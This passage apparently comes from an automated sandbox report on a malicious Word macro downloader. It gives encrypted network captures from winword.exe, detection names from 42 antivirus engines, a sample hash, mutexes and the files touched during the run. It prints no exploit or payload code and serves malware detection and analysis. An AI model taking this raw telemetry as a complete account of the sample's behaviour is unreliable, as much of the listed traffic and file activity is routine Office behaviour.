583. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04:\\xc4p\\x08\\x05\\xab\\x1c\\x16\\xc0@?\\xd3\\xf1\\xf22k\\xbe\\x9cwc\\x0c\\x94\\xe0\\xd8\\x1a`\\$\\xec\\x1al\\x02p&\\x90\\xa4\\x93xdj\\xbd\\xeb,/\\xces.\\x86%\\xc0k\\x95\\xf4rw*x\\x0f\\xca\\x1d\\x03\\xff\\xc3\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x81\\xc5\\xf70\\x00>\\xc52\\x01\\x0b6\\x15v\\x13w\\xa3beka\\xcd\\x80\\x06x\\xf9\\x0e\\xf0\\xa8\\xb2\\x95trk\\xc4n?\\x1f\\xa0^\\xf5g\\x162\\xc9\\xfe\\x02v\\xad"
584.  
585.  
586. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf2\\xfa\\x07r\\xd0\r\\x89\\x9c\\x1a\\xfe\\x9b\\x1d\\xfc*\\xdb\\x92\\xb3\\x0e/g\\x86\\x17\\x9b0\\x94'!\\x978,\\xd4\\x90\\xdf\\x1406\n\\xb0\\xc9\\xab'hf\\xc9\\xc8\\xe6f!\\x12zk\\xda\\xbd\\xc0f\\xb3\\xcb\\xc1x\\xaae\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfa\\xc7\\x8e~hr\n\\xe2\\xb6**\\x01\\x9e\\xad\\x9e\\xc4\\xa3b\\xeag\\xfe\\xa8\\xbb\n\\x9a\\x13\\xa5j\\x8aq\\x0c\\x81\\xee\\xca\\xa3\\xe8\\x90\\xf0\\x8e\\xa8su\\xca\\xcf\\x9f\\xd7\\xdd"
587.  
588.  
589. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x1b'7\\x04\\x16\\x19\\x81\\x15\\x8a\\xd6v\\x10b\\xa8\\xef\\xaftu\\x13~\\xde!p*z\\x1ff|8\\xb2a\\xdd^b\\x9f>\\xbf\\xd6\\x07\\x10\\x07`qi\\x87\\x1a\\xd0\\xe1\\x11\\xc5\\xd7\\x9a\\xd20\\xca \\x9d\\x90\\xfa9\\x9c\\x1cb\\xdf\\xca!\\xf1\\xc5\\xc1\\x95\\xb5\\xd1n\\xda\\xe5\\xdav\\xd6\\x10_\\xfe\\x93c\\xc6>\\xf4r\\x0bscrt\\xedv\\xcfx*\\x053m\\xf0\n2\\xd7\\xf7\\x83m\\xc6=\\xff\\xb2\\x981\\xa3\\xf2cg\\xbf\\xcdt\\x0cm#wf\\xf5\\xafw\\gs\\xef\\x14\\xabs\\xdf\\x8be\\x7f;,\\x8e\\xf6`\\x16\\xcf\\xb5rb(\\x04\\x92b6>k;\\xc3\\x15z_\\x93g\\xa0\\xe1\\xcf\\xf8e\\xab\\x80b\\xa3\\x85\\xab\\xc5'\\xc3ff9\\xfd\\xc4.\\xc2\\x84k3\\x864 \\x8d!ko\\xaa\\x0c3;5&\\xd8\\x99\\xf7\\x86\\xbeh\\xdci\"\\xe6\\xc08\\xb2\\x17?\\xc9\\x9a\\x93tc\\x80c\\xd8nfg2\\xe7\\xd2\\xe9.6\\xc5`\\xd5\\x8a\\x89\\xed\\xb3)\\x1c\\x07#t`\\xc4\\x8c"
590.  
591.  
592. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010=q\\xac(\\x93|\\xad\\xe5!\\x0cc'\\xa5\\xb8(\\xdc\\x85z3\\x91'\\xd8\\x95iz\\x02\\x9c\\xeb(k((v\\xe9i\\xc9\\x11>\n\\xf1&\\xef\\xe4=u\\x00r\\x16\\xf5\\xbe\\x1f\\xaa \\xff\\xafp\\x16\\xd6ytu\\xba\\xf2tbcq\\xfd0\\x167\\x95\\x93_\\xda\\xa2\\xb3zld<\\xbaf\\xcd-?jy\\xa6jq\\x1d\\x91\\xe4\\xa1 \\x15\\xda\\x00\\xa6\\xe1p2gt\\xf1qza@\\xf8+\\xb2\\x0f\\xfe\\xb8c:\\x12\\xe0:\\xe9\\xe0\\xe1c\\xbb#\\xa1\\x00a\\xaa\\xa9\\xe3\\x8a\\xa2\\x9c\\xbeq\\x16l\\xf4\\xc9\\x93\\xba\\\\xc8l\\xdb\\xf8\\x80\\x8d7\\xa3\\x85\\x04\\x16\\x1f\\xf3\\x83y9\\xe6\\xeat5\\xf2\\x99\\x81z\\xa3e2\\x85\\x07\\xd6@\\xa42\\xc3u\\x96\t>\\x03l\\x19\\x05\\x8d\\x14\\x11d\\xe6|\\xfbx<\\xeb\\x1d\\xa4\\xb3#\\xaeb\\xedy;a2\\x13\\xf9\\xae\\xac\\xc7?\\xc7'\\xa2hm\\x0b\\x83\\xff'i>\\xf1_\\x98\\xa5\\xc8_\\x96\\x1b\\x11z!\\xe7\\xed\\xc0s\\xe5\\x13\\x1f,\\xc2r\\x94\\x1e\\xb2"
593.  
594.  
595. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04n\\xe0\\x88\\x1c\\xf8\\x8a/r\\x0c$\\x12\\xa2\\xd9l\\xab\\xd7\t8igj\\x15\\xb5y\\x1c\\xe89z\\xdfe6'\\xe7c\\xa5 \\x96\\x83nt\\xdb6k\\xb9\\xa4jw\\xbe\\x81\\xa37\\xdff\\x8d\\xf5\\xba\\xc5t\\x9d\\xf1\\xcat'\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9b\\xe8m\\xa8\\x1f\\xb0\\xa1aag\\xb5\\xd8\\xc9i\\xf2\\xabys\\xfev\\xba\\x93\\xab\\xa1\\x03\\x14\\xbf^$^\\x9fs\\xcc\\xb2'd3\\xc9\\\\x07\\x90\\x04\\xfbo\\xb4$q;"
596.  
597.  
598. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010o\\xf0x\\xb4\\x95j\\xf4\\xf1\\xd7\\x8f`h\\xaaio\\xb6\\x8fo3\\x92\\xbcr\\x03.\\xaegz\\x17\\x1el7\\xe5i\\x16\\x83\\xe5\\xfd\\x83\\xbe\\xf4?k9\\xa1\\xa9\\x90_\\xa0\\x80\\xcd\\xafk8^?\\xcf\\xa2)\\xc9\\xefm\\x87\\xd0m\\x87\\xee\\xe4~\\x83\\x18\\x99\\xda\\xcb9(c\\xa3\\xb9\\x14\\xef\\xa2.\\xfcj\\xd1\\x03\\xd7\\x99\"\\xb9\\xd0\\x90d\\xca2\\xf1\\xd1\\x85\\xcd\\xd4\\xbb\n\\xe6\\xf61k\\x07k3\\xa1\\xebk\\xef\\x08\\x99=\\xbf\\xc89\\x17\\x81b3\\xc8p\\xd4\\xe3(q\\xba\\xa92*\\xe0n\\x86\\xe7#\\xb5\\xb4\\xba\\x920\\x1b\\xcbp\\xbe4\\x93\\xadm\\xef\\xd56x\\xb6\\xe7\\x978\\x9e\\x10^\\xc4xc\\x97kcqk5\\x8a\\xd4\\x17\\xcad\\x85;u\\xa0\\x99\\x82w^m\\xf4\\x0b`\\x97\\xd8.-\\xdc\\xc6\\xc3\\xc7*\\xaafp\\xda:\"!\\xd4w\\x9c\\x8d) \\xbc\\x92|<\\xa7|\\xb9h\\xe1j\\xae\\x1f\\xf9\\xb9\\x01\\x15h\\xcd\\xe6i\\xef\\xd2\\xb4\\x8d\\xc4a\\xf04n\\xdc5\\xb5\\x19!@\\xe7\\xb7\\xb8"
599.  
600.  
601. "http_request": "winword.exe_WSASend_get /pki/crl/products/miccodsigpca_08-31-2010.crl http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: thu, 14 feb 2019 06:01:18 gmt\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: crl.microsoft.com\r\n\r\n"
602.  
603.  
604. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x7f\\x01\\x00\\x00\\x03\\x01u\\x0fq\\x8b\\x16\\xc7x,\\z\\x9c~$\\x06\\xe0\\xdb\\xa6\\x02\\x8e\\x0fn\\xb7\\xcf\\x0eeec|l \\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00:\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00!\\x00\\x1f\\x00\\x00\\x1cactivation.sls.microsoft.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
605.  
606.  
607. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa3\\xbd\\xa3\\xb9\\xf0\\x07\\x01\\xf8\\x1bxz\t\\x81saa\\x80\\xb7\\xa1r\\xf2\\xdc'\\xb1r<r\\xc5\\xa3\\xc6\\x82\\x9c\\x7f\r\\x91j\\xd0.\\xbd\\x10\\xbe\\xaf\\x1f\\xad\\x8bj\\xc2+\\xf2\\xc3\\xbausg\\x9b\\xd8\\x82\\xe1l\\x0f\\xa0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfbkdm\\xd3\\x11\\x9c\\x9e\\xa6\\xd3\\x18\\xb0\\xc7\\x9a\\x9a\\xea\\xfbx\\x10\\x14\\xe5\\x81\\xe1\\x03_\\xa0\\x94\\xea`y9=\\xbd\\xdd:\\x1dk\\xda\\x905(?#\\xbef\\x9ec\\xe8"
608.  
609.  
610. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01`\\xbf\\xfc\\x90=\\xa9\\xe1\\xa7&\\xbbj\\x03\\x97\\x8d\\xdd r\\x1c\\xfbw\\xb6e\\x89y\\xeeh\\xb2n\\xc5\\x19\\x13b-re\\xe0\\xe1\\x19\\x04\\x0c\\x86\\9\\xa7\\x1f\\xd7\\x0bk\\xd16\\xcc\\x9f;\\xe0\\x9d\\xa0\\xb2\t\\x98\\xfb)\\xc1\\xf1\\xcaz\\xb1\\x05q\\xa4\\xe4\\xc3\\xf4\\xf9\\xdcj\\x162v\\x1e\\xe9\\xe9\\xf8\\xdd\\xd6\\xad\\xd0\\x9e@z\\x14n\\xbf\\x0f\\xce\\xa6\\xc9vh\\x9a\\x852\\xa9<\\xbc\\xd96\\xf2\\x89\\x84\\xf9\\xba\\x1a\\xb24v\\xcd\\x0f\\xf7\\x8c>k\\xbc\\xb7\\xban\\xb4o\\x8bz\\x8d%\\xd2r\\xe3\\x85\\xcd6q\\x82k#\\x81\\xd6\\xf6\\x13\\xeavk\\xafs\\xd4\\x7f\\x02\\xfac\\xe6\\x04\\x94\\x8f\\xf0\\xec\\x95\\x7f\\xfcd\\x87\\xb8\\x11\\xe3\\xcc\\x14i\\xb5\\xd9\\xcd\\xd8\\x9d#.\\xa9\\x93\\x994\\xa6\\xe3\\x94tm'u\\x9b\\xd6\\xf2\\x8c\\xc7\\xe2\\x84\\xcc\\x16\\xc3\\x96w\\xfe\\x03\\x99r\\xe3\\x14i9r\\x9a\\xc9\\x17\\xed\\x87\\xc3\\xaf\\xbcs\\xde\rm\\xe4\\x92\\xa8\\xf0\\xe1h\\x84a\\x19\\xdc6\t\\xaf&m\\x1e\\x86a\\xf5\\xaa\\xf7\\x84"
611.  
612.  
613. "http_request": "winword.exe_WSASend_\\x17\\x03\\x019p\\x1e\\xd3\\xd1'\\xd2\\x8cv\\x96\\xd7\\xf7\\xfa\\xd87\\xf7\\xd5tga(\\x04\\x7f\\xa9*\\xd6\\xd8\\xf6c\\xd8\\xcf\\x06-\\xa2lc\\x91\\xfb\\xf2\\xe3#z\\xb8k\\x0f,\\xfc\\x8b\\x13\\xe0\\xd9\\xbaqas\\xdc\\xf21|@\\xbdb\\xf5\\xf9y\\xb2\\xee\\xa2g\\x8f\\xc6b\\xa1\\x99e\\x13\\x04xl\\xd9\\x94\\x04'\\xf5'\\xbe,\\x89\\xc9d?\\x9a2$~u\\xb0\\x96\ty\\xff2\\xb5p\\xc2v\\xb0^\\xe12\\xd1>\\x91f~\\xb0kg\\xa5-q?\\xa9\\xbe\\xd3\\xe6zq6d\\xa3\\x05\\xea\\xa5e\"92o\\xc1 '\\xcebw\\xb9x(\\x9ai\\x9b%\\xe1\\xec\\xe5\\x86\\xeb\\xf9u'\\x7f\\x82\\xbf\\xef\\x97\\x90\\xec\\xd6\\xced|\\xf6\\xa7\\xf7a\\x05\\xf6\\xc9+c\\x13c\\x03\r\\xff\\xe9\\xbd\\xeb\\xc3\\x8b\\xe4'\\xefwqw\\xb4\\xa3@\\xd9:\\xf0\\xd5i\\xe2\\x83@\\xb7o\\xb6\\xe2\\xfe7w\\xfa\\xed\\xcf4v\\xaa%`x\\xa8\\xd9\\x91i\\x0b\\x7f\\x19\\x17\\xd6n\\x0fx\\xdb\\xee!v&\\x90\\x99\\xae\\xcei\\xd7\\x0ek\\x83s\\x8c\\xab,"
614.  
615.  
616. "http_request": "winword.exe_WSASend_get /pki/crl/products/microsofttimestamppca.crl http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: thu, 18 jul 2019 05:00:49 gmt\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: crl.microsoft.com\r\n\r\n"
617.  
618.  
619.  
620.  
621. "Description": "Creates a hidden or system file",
622. "Details":
623.  
624. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF14e77f6.TMP"
625.  
626.  
627.  
628.  
629. "Description": "File has been identified by 42 Antiviruses on VirusTotal as malicious",
630. "Details":
631.  
632. "MicroWorld-eScan": "W97M.Downloader.ICL"
633.  
634.  
635. "FireEye": "W97M.Downloader.ICL"
636.  
637.  
638. "ALYac": "Trojan.Downloader.DOC.gen"
639.  
640.  
641. "K7GW": "Trojan ( 00536d111 )"
642.  
643.  
644. "K7AntiVirus": "Trojan ( 00536d111 )"
645.  
646.  
647. "Arcabit": "HEUR.VBA.CG.2"
648.  
649.  
650. "NANO-Antivirus": "Trojan.Script.ExpKit.fqlyfe"
651.  
652.  
653. "F-Prot": "New or modified W97M/Macro"
654.  
655.  
656. "Symantec": "W97M.Downloader"
657.  
658.  
659. "ESET-NOD32": "VBA/TrojanDownloader.Agent.MKP"
660.  
661.  
662. "TrendMicro-HouseCall": "Trojan.W97M.POWLOAD.SMRV08"
663.  
664.  
665. "ClamAV": "Doc.Downloader.Powload-6960273-0"
666.  
667.  
668. "Kaspersky": "HEUR:Trojan.MSOffice.SAgent.gen"
669.  
670.  
671. "BitDefender": "W97M.Downloader.ICL"
672.  
673.  
674. "ViRobot": "DOC.Z.Agent.165504.G"
675.  
676.  
677. "Tencent": "Heur:Trojan.Script.LS_Gencirc.7132091.0"
678.  
679.  
680. "Ad-Aware": "W97M.Downloader.ICL"
681.  
682.  
683. "Emsisoft": "Trojan-Downloader.Macro.Generic.O (A)"
684.  
685.  
686. "Comodo": "Malware@#1f1r6fzjh20cs"
687.  
688.  
689. "F-Secure": "Malware.VBA/Dldr.Agent.dmrjz"
690.  
691.  
692. "TrendMicro": "Trojan.W97M.POWLOAD.SMRV08"
693.  
694.  
695. "McAfee-GW-Edition": "BehavesLike.Downloader.cg"
696.  
697.  
698. "Sophos": "Troj/DocDl-TOC"
699.  
700.  
701. "SentinelOne": "DFI - Malicious OLE"
702.  
703.  
704. "Cyren": "W97M/Macro"
705.  
706.  
707. "Avira": "VBA/Dldr.Agent.dmrjz"
708.  
709.  
710. "Antiy-AVL": "TrojanDownloader/MSOffice.Agent.mkp"
711.  
712.  
713. "Microsoft": "TrojanDownloader:O97M/Donoff"
714.  
715.  
716. "Endgame": "malicious (high confidence)"
717.  
718.  
719. "AegisLab": "Trojan.MSOffice.SAgent.4!c"
720.  
721.  
722. "ZoneAlarm": "HEUR:Trojan.MSOffice.SAgent.gen"
723.  
724.  
725. "GData": "Macro.Trojan-Downloader.Posh.Z@gen"
726.  
727.  
728. "TACHYON": "Suspicious/W97M.Obfus.Gen.6"
729.  
730.  
731. "AhnLab-V3": "VBA/Downloader.S15"
732.  
733.  
734. "McAfee": "W97M/Downloader.ctl"
735.  
736.  
737. "Zoner": "Probably W97Obfuscated"
738.  
739.  
740. "Rising": "Trojan.Runner/VBA!1.B7CF (CLASSIC)"
741.  
742.  
743. "Ikarus": "Trojan-Downloader.VBA.Agent"
744.  
745.  
746. "Fortinet": "VBA/Agent.DF8D!tr.dldr"
747.  
748.  
749. "AVG": "Other:Malware-gen Trj"
750.  
751.  
752. "Panda": "O97M/Downloader"
753.  
754.  
755. "Qihoo-360": "virus.office.qexvmc.1075"
756.  
757.  
758.  
759.  
760. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
761. "Details":
762.  
763. "target": "clamav:Doc.Downloader.Powload-6960273-0, sha256:ee12d6a7678d385cad6d92d505223faf379e765e2e4aa55694b49d462445ae64, type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 2 11:37:00 2019, Last Saved Time/Date: Thu May 2 11:37:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0"
764.  
765.  
766.  
767.  
768.  
769. * Started Service:
770. "osppsvc"
771.  
772.  
773. * Mutexes:
774. "Local\\ZoneAttributeCacheCounterMutex",
775. "Local\\ZonesCacheCounterMutex",
776. "Local\\ZonesLockedCacheCounterMutex",
777. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
778. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
779. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
780. "Local\\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office15",
781. "CicLoadWinStaWinSta0",
782. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
783. "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
784. "Global\\552FFA80-3393-423d-8671-7BA046BB5906",
785. "Local\\F99C425F-9135-43ed-BD7D-396DE488DC53",
786. "Global\\CLR_CASOFF_MUTEX",
787. "Global\\.net clr networking"
788.  
789.  
790. * Modified Files:
791. "C:\\Users\\user\\AppData\\Local\\Temp\\Docs_9b58406a548c3db723f3d6e7370903b7.html",
792. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF880680BCBAAEB2F7.TMP",
793. "C:\\Users\\user\\AppData\\Local\\Temp\\~$cs_9b58406a548c3db723f3d6e7370903b7.html",
794. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS242CD7DB-A850-4C42-BD9B-FD3E2C08771B.tmp",
795. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF484F5CA0-8D9F-41B2-9799-A6CA34291BC8.tmp",
796. "C:\\Users\\user\\AppData\\Local\\Temp\\~DFD751E2B35298E549.TMP",
797. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Office\\15.0\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=10",
798. "C:\\Users\\user\\AppData\\Local\\Temp\\VBE\\MSForms.exd",
799. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
800. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
801. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
802. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
803. "C:\\Users\\user\\AppData\\Local\\Temp\\CabA9CA.tmp",
804. "C:\\Users\\user\\AppData\\Local\\Temp\\TarA9CB.tmp",
805. "C:\\Users\\user\\Application Data\\Microsoft\\Forms\\WINWORD.box",
806. "C:\\Users\\user\\AppData\\Local\\Temp\\~DFC95D5C527A32B46A.TMP",
807. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF89B7193F7071FE8D.TMP",
808. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEAFB.tmp",
809. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEAFD.tmp",
810. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEAFC.tmp",
811. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEB3D.tmp",
812. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEB8C.tmp",
813. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEC39.tmp",
814. "C:\\Users\\user\\AppData\\Local\\Temp\\cabECB7.tmp",
815. "C:\\Users\\user\\AppData\\Local\\Temp\\cabECC8.tmp",
816. "C:\\Users\\user\\AppData\\Local\\Temp\\cabECC9.tmp",
817. "C:\\Users\\user\\AppData\\Local\\Temp\\cabED27.tmp",
818. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEE51.tmp",
819. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEE52.tmp",
820. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEEA1.tmp",
821. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEEB2.tmp",
822. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF4F.tmp",
823. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF60.tmp",
824. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF61.tmp",
825. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF71.tmp",
826. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF82.tmp",
827. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF83.tmp",
828. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF94.tmp",
829. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEFE3.tmp",
830. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF042.tmp",
831. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF043.tmp",
832. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF0D0.tmp",
833. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF100.tmp",
834. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF15F.tmp",
835. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF1EC.tmp",
836. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF27A.tmp",
837. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF28B.tmp",
838. "C:\\Users\\user\\AppData\\Local\\Temp\\CabF28C.tmp",
839. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF2DC.tmp",
840. "C:\\Users\\user\\AppData\\Local\\Temp\\CabF2EC.tmp",
841. "C:\\Users\\user\\AppData\\Local\\Temp\\CabF2FE.tmp",
842. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF300.tmp",
843. "C:\\Users\\user\\AppData\\Local\\Temp\\TarF2FF.tmp",
844. "C:\\Users\\user\\AppData\\Local\\Temp\\TarF2ED.tmp",
845. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD",
846. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD",
847. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF3DC.tmp",
848. "C:\\Users\\user\\AppData\\Local\\Temp\\TarF29C.tmp",
849. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF469.tmp",
850. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF47A.tmp",
851. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF4C9.tmp",
852. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF528.tmp",
853. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21",
854. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21",
855. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF613.tmp",
856. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF643.tmp",
857. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF75E.tmp",
858. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF72F.tmp\\gostname.xsl",
859. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF72F.tmp\\Content.inf",
860. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF7AE.tmp\\mlaseventheditionofficeonline.xsl",
861. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF82D.tmp",
862. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76",
863. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851219fn=gostname.xsl",
864. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF8CB.tmp",
865. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF80C.tmp\\HexagonRadial.glox",
866. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF7AE.tmp\\Content.inf",
867. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76",
868. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF9AA.tmp",
869. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF9BA.tmp",
870. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF87C.tmp\\Text Sidebar (Annual Report Red and Black design).docx",
871. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DC.tmp\\ConvergingText.glox",
872. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF9CB.tmp\\CircleProcess.glox",
873. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DD.tmp\\gb.xsl",
874. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFAE6.tmp",
875. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DB.tmp\\Element design set.dotx",
876. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFBF1.tmp",
877. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFC13.tmp",
878. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF80C.tmp\\Content.inf",
879. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DC.tmp\\Content.inf",
880. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF9CB.tmp\\Content.inf",
881. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF87C.tmp\\Content.inf",
882. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFD3E.tmp",
883. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFA78.tmp\\ThemePictureGrid.glox",
884. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DD.tmp\\Content.inf",
885. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Word Document Bibliography Styles\\TM02851225fn=mlaseventheditionofficeonline.xsl",
886. "C:\\Users\\user\\AppData\\Local\\Temp\\cabFDCD.tmp",
887. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC12.tmp\\ieee2006officeonline.xsl",
888. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDF8DB.tmp\\Content.inf",
889. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC01.tmp\\ThemePictureAccent.glox",
890. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328919fn=Hexagon Radial.glox",
891. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC24.tmp\\chevronaccent.glox",
892. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\SmartArt Graphics\\1033\\TM03328908fn=Circle Process.glox",
893. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFFCC.tmp\\iso690nmerical.xsl",
894. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD8E.tmp\\content.inf",
895. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD5E.tmp\\Banded.thmx",
896. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7A.tmp\\iso690.xsl",
897. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1B4.tmp\\Crop.thmx",
898. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF7C.tmp\\APASixthEditionOfficeOnline.xsl",
899. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFF4B.tmp\\content.inf",
900. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFC24.tmp\\Content.inf",
901. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFE7A.tmp\\Content.inf",
902. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFD5E.tmp\\content.inf",
903. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\15\\Managed\\Document Themes\\1033\\TM03090430fn=Banded.thmx",
904. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDFA78.tmp\\Content.inf",
